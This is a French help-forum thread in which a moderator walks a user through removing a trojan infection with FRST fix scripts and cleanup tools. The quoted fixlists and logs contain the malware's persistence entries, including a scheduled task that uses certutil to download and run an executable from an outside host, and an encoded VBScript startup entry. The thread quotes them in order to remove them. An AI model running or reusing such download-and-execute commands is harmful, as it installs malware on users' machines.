SysinfY2X et trojans

afellah -  
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -

4 réponses

Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Salut,

Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :

CCleaner
Java
McAfee WebAdvisor


PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu tiens à le garder, désactive la surveillance de CCleaner, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/





Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [SysinfY2X] => C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [CloudNet] => C:\Users\AFELLAH\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-20] (Accès refusé) [Fichier non signé] <==== ATTENTION
Task: {007F47C8-2433-4A39-B02E-8F8F8C824C66} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {793C92AC-7F63-48FC-BBCE-1317ABC9CE1B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
Task: {56DD15B7-F473-460D-BCCE-B26A1249B0B5} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)

Pour nettoyer les disques amovibles des virus USB, suivre dans l'ordre les étapes du tutoriel : insère un à un tes clefs USB et disques durs externes que tu as pour les nettoyer. Envoie ensuite les rapports sur https://pjjoint.malekal.com/ et donne les liens menant à ces rapports pour que l'on puisse les consulter.

Brancher toutes les clefs USB et autres périphériques amovibles.
  • Télécharger Remediate VBS Worm
  • Lancer l'option B
  • Taper la lettre de la clef USB, par exemple, E et entrée

[color=red]ATTENTION: NE PAS INDIQUER LE LECTEUR DE TON DISQUE DUR ![/color]
  • Va dans "Mon ordinateur" puis disque "C", un rapport "Rem-VBS.log" doit s'y trouver.

Ouvre ce rapport avec le bloc-notes et copie/colle le contenu ici dans une prochaine réponse.


5°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.

1
afellah
 
Bonjour Malekal_morte,

un grand merci .

Voila le résultat de mon fix :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 19-11-2019
Exécuté par AFELLAH (20-11-2019 16:30:21) Run:1
Exécuté depuis C:\Users\AFELLAH\Desktop
Profils chargés: AFELLAH (Profils disponibles: Admin & AFELLAH & Adminweb)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [SysinfY2X] => C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [CloudNet] => C:\Users\AFELLAH\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-20] (Acc�s refus�) [Fichier non sign�] <==== ATTENTION
Task: {007F47C8-2433-4A39-B02E-8F8F8C824C66} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {793C92AC-7F63-48FC-BBCE-1317ABC9CE1B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
Task: {56DD15B7-F473-460D-BCCE-B26A1249B0B5} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:


Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\SysinfY2X" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\StillPond" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{007F47C8-2433-4A39-B02E-8F8F8C824C66}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{007F47C8-2433-4A39-B02E-8F8F8C824C66}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{793C92AC-7F63-48FC-BBCE-1317ABC9CE1B}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{793C92AC-7F63-48FC-BBCE-1317ABC9CE1B}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{56DD15B7-F473-460D-BCCE-B26A1249B0B5}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{56DD15B7-F473-460D-BCCE-B26A1249B0B5}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\update-sys => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-sys" => supprimé(es) avec succès

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès


========= Fin de RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17297791 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 6417218 B
Edge => 0 B
Chrome => 220613974 B
Firefox => 193026512 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 66228 B
ProgramData => 66228 B
systemprofile => 58624634 B
systemprofile32 => 59625775 B
LocalService => 59625775 B
NetworkService => 59664103 B
Admin => 59695761 B
AFELLAH => 291764392 B
Adminweb => 571119076 B

RecycleBin => 10570974197 B
EmptyTemp: => 11.3 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 16:36:14

0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685 > afellah
 
ok fais bien le reste demandé.
0
elomari asmaa Messages postés 3 Date d'inscription   Statut Membre Dernière intervention  
 
Bonjour malekal,

j'ai fais ce que tu a demandé, par contre j'ai tjrs des alertes de sécurité (capture écran ) .

voici les liens générés à nouveau :

https://pjjoint.malekal.com/files.php?id=FRST_20191121_t8s5r15i8n14
https://pjjoint.malekal.com/files.php?id=20191121_m9o10l6e7c10
https://pjjoint.malekal.com/files.php?id=20191121_w11v5q12u8k11


0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685 > elomari asmaa Messages postés 3 Date d'inscription   Statut Membre Dernière intervention  
 
Malwarebytes n'est pas installé.
Donc tu n'as pas tout fait.
MBAM était à faire dans le 3)
0
elomari asmaa Messages postés 3 Date d'inscription   Statut Membre Dernière intervention  
 
je n'ai pas arriver à l'installer , un message à la fin me dit q'une erreur est survenu et le programme n'installe pas :/
0
ChariduP Messages postés 5202 Date d'inscription   Statut Contributeur Dernière intervention   2 710
 
Bonjour afellah,

Quel est le problème ? Il faut que tu sois plus précis.

C'est bien d'avoir envoyer les liens mais il faut expliquer le problème.

Cordialement,
0
afellah
 
je m'excuse , je me suis trompée du forum, je supprime ma question
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
Task: {5802B300-2C68-4711-A755-294A4CFBEE95} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
C:\Windows\rss\csrss.exe
Task: {BBA20E39-78F4-4F8C-B346-942D10EE9FCE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
0
afellah
 
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 21-11-2019
Exécuté par AFELLAH (22-11-2019 14:58:33) Run:2
Exécuté depuis C:\Users\AFELLAH\Desktop
Profils chargés: AFELLAH (Profils disponibles: Admin & AFELLAH & Adminweb)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\...\Run: [StillPond] => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
Task: {5802B300-2C68-4711-A755-294A4CFBEE95} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4018176 2019-11-20] () [Fichier non signé] <==== ATTENTION
C:\Windows\rss\csrss.exe
Task: {BBA20E39-78F4-4F8C-B346-942D10EE9FCE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AFELLAH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:


Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\Software\Microsoft\Windows\CurrentVersion\Run\\StillPond" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5802B300-2C68-4711-A755-294A4CFBEE95}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5802B300-2C68-4711-A755-294A4CFBEE95}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
C:\Windows\rss\csrss.exe => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BBA20E39-78F4-4F8C-B346-942D10EE9FCE}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BBA20E39-78F4-4F8C-B346-942D10EE9FCE}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-2431860244-1468966284-1414806171-1011\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès


========= Fin de RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15109986 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 578191520 B
Edge => 0 B
Chrome => 135641223 B
Firefox => 23643531 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 128 B
NetworkService => 14948 B
Admin => 14948 B
AFELLAH => 11001027 B
Adminweb => 11001027 B

RecycleBin => 384092 B
EmptyTemp: => 747.1 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 15:00:21

0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685 > afellah
 
Il revient ?
0
afellah
 
je n'arrive tjr pas à installer malwarebytes :/
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685 > afellah
 
Fais un scan en ligne avec NOD32 puis enregistre le rapport. Envoie le sur https://pjjoint.malekal.com/ et donne le lien ici.
0
afellah
 
j'ai fais le scan en ligne, voici les résultats de mon dernier scan frst:

https://pjjoint.malekal.com/files.php?id=FRST_20191125_v11k15f12g11q5
https://pjjoint.malekal.com/files.php?id=20191125_u12j14x13v7t7
https://pjjoint.malekal.com/files.php?id=20191125_d10y15q5o1512
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Toujours là, c'est un PC dans un réseau ?
Si oui tu as d'autres postes infectés ?

Toutes les mises à jour de Windows 7 sont installés ?

0